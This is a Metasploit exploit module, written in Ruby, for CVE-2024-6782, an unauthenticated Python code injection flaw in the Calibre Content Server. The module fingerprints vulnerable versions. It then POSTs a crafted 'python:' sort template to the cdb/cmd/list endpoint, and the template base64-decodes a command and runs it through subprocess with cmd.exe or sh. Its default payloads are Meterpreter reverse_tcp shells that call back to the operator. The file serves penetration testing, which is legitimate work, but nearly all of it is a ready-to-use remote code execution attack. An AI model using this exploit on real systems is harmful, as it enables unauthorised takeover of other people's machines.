Path: blob/master/modules/exploits/multi/misc/calibre_exec.rb
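class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking
  include Msf::Exploit::Remote::HttpClient
  prepend Msf::Exploit::Remote::AutoCheck

  # Inclusive bounds of the Calibre versions +check+ reports as vulnerable.
  VULN_MIN_VERSION = '6.9.0'
  VULN_MAX_VERSION = '7.15.0'

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Calibre Python Code Injection (CVE-2024-6782)',
        'Description' => %q{
          This module exploits a Python code injection vulnerability in the Content Server component of Calibre v6.9.0 - v7.15.0. Once enabled (disabled by default), it will listen in its default configuration on all network interfaces on TCP port 8080 for incoming traffic, and does not require any authentication. The injected payload will get executed in the same context under which Calibre is being executed.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Amos Ng', # Discovery & PoC
          'Michael Heinzl', # MSF exploit
        ],
        'References' => [
          [ 'URL', 'https://starlabs.sg/advisories/24/24-6782'],
          [ 'CVE', '2024-6782']
        ],
        'DisclosureDate' => '2024-07-31',
        'Platform' => ['win', 'linux', 'unix'],
        'Arch' => [ ARCH_CMD ],

        'Payload' => {
          # Kept for compatibility with existing payload selection. Since the
          # command is now base64-encoded before it reaches the template (see
          # exec_calibre), backslashes would no longer break the request.
          'BadChars' => '\\'
        },

        'Targets' => [
          [
            'Windows_Fetch',
            {
              'Arch' => [ ARCH_CMD ],
              'Platform' => 'win',
              'DefaultOptions' => {
                'FETCH_COMMAND' => 'CURL',
                'PAYLOAD' => 'cmd/windows/http/x64/meterpreter/reverse_tcp'
              },
              'Type' => :win_fetch
            }
          ],
          [
            'Linux Command',
            {
              'Platform' => [ 'unix', 'linux' ],
              'Arch' => ARCH_CMD,
              'Type' => :nix_cmd,
              'DefaultOptions' => {
                'PAYLOAD' => 'cmd/unix/python/meterpreter/reverse_tcp'
              }
            }
          ],

        ],
        'DefaultTarget' => 0,

        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [IOC_IN_LOGS]
        }
      )
    )

    register_options(
      [
        Opt::RPORT(8080)
      ]
    )
  end

  # Fingerprints the Content Server by scraping CALIBRE_VERSION from the page
  # served at TARGETURI and comparing it against the vulnerable range.
  #
  # @return [Msf::Exploit::CheckCode] Appears when the version lies inside
  #   VULN_MIN_VERSION..VULN_MAX_VERSION, Safe when it lies outside, Unknown
  #   when the host is unreachable, answers with a non-200 status, or the
  #   page carries no version string.
  def check
    begin
      res = send_request_cgi({
        'method' => 'GET',
        'uri' => normalize_uri(target_uri.path)
      })
    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError
      return CheckCode::Unknown
    end

    return CheckCode::Unknown unless res && res.code == 200

    # String#match returns nil when the pattern is absent. The previous
    # version indexed that result unconditionally, so any 200 response
    # without a version banner (e.g. another service on port 8080) raised
    # NoMethodError instead of yielding a CheckCode.
    match = res.body.to_s.match(/CALIBRE_VERSION\s*=\s*"([^"]+)"/)
    version = match && match[1]
    return CheckCode::Unknown if version.nil?

    vprint_status("Version retrieved: #{version}")

    if Rex::Version.new(version).between?(Rex::Version.new(VULN_MIN_VERSION), Rex::Version.new(VULN_MAX_VERSION))
      CheckCode::Appears
    else
      CheckCode::Safe
    end
  end

  # Entry point: sends the encoded payload as the command to run.
  def exploit
    execute_command(payload.encoded)
  end

  # Runs +cmd+ on the target and reports progress to the operator.
  #
  # @param cmd [String] the command to execute
  # @return [void]
  def execute_command(cmd)
    print_status('Sending payload...')
    exec_calibre(cmd)
    print_status('Exploit finished, check thy shell.')
  end

  # Delivers +cmd+ through the cdb/cmd/list endpoint of the Content Server.
  #
  # The request body is the JSON argument list of the "list" command; its
  # sort field (sixth element) is a "python:" template that the server
  # evaluates as evaluate(a, b). The template runs the command through
  # subprocess, trying cmd.exe first and falling back to sh, so one request
  # serves both targets.
  #
  # +cmd+ is base64-encoded here and decoded inside the template, so it never
  # appears verbatim inside the JSON string or the Python source literal. The
  # previous version interpolated it into a single-quoted Python literal, so
  # a payload containing a quote, double quote or newline corrupted either
  # the JSON or the template; BadChars only excluded backslashes.
  #
  # @param cmd [String] the command to execute on the target
  # @return [void]
  def exec_calibre(cmd)
    # Strict base64 (no line breaks): the alphabet [A-Za-z0-9+/=] needs no
    # escaping in JSON or in a Python string literal.
    encoded_cmd = [cmd].pack('m0')

    # The JSON escape "\n" becomes a real newline in the template; each
    # Python nesting level is indented one space deeper than the previous.
    template = 'python:def evaluate(a, b):\\n' \
      ' import subprocess, base64\\n' \
      " c = base64.b64decode('#{encoded_cmd}').decode()\\n" \
      ' try:\\n' \
      "  return subprocess.check_output(['cmd.exe', '/c', c]).decode()\\n" \
      ' except Exception:\\n' \
      "  return subprocess.check_output(['sh', '-c', c]).decode()"

    body = "[[\"template\"], \"\", \"\", \"\", 1, \"#{template}\"]"

    res = send_request_cgi({
      'method' => 'POST',
      'ctype' => 'application/json',
      'data' => body,
      'uri' => normalize_uri(target_uri.path, 'cdb/cmd/list')
    })

    # A missing response is deliberately not a failure: check_output waits
    # for the child to exit, so a long-running payload (a reverse shell)
    # would keep the HTTP request open until the client times out, while the
    # session has presumably already called back.
    if res.nil?
      vprint_status('No HTTP response received (expected for a blocking payload)')
    elsif res.code == 200
      print_good('Command successfully executed, check your shell.')
    elsif res.code == 400
      fail_with(Failure::UnexpectedReply, 'Server replied with a Bad Request response.')
    else
      print_error("Unexpected HTTP response code #{res.code}")
    end
  end

end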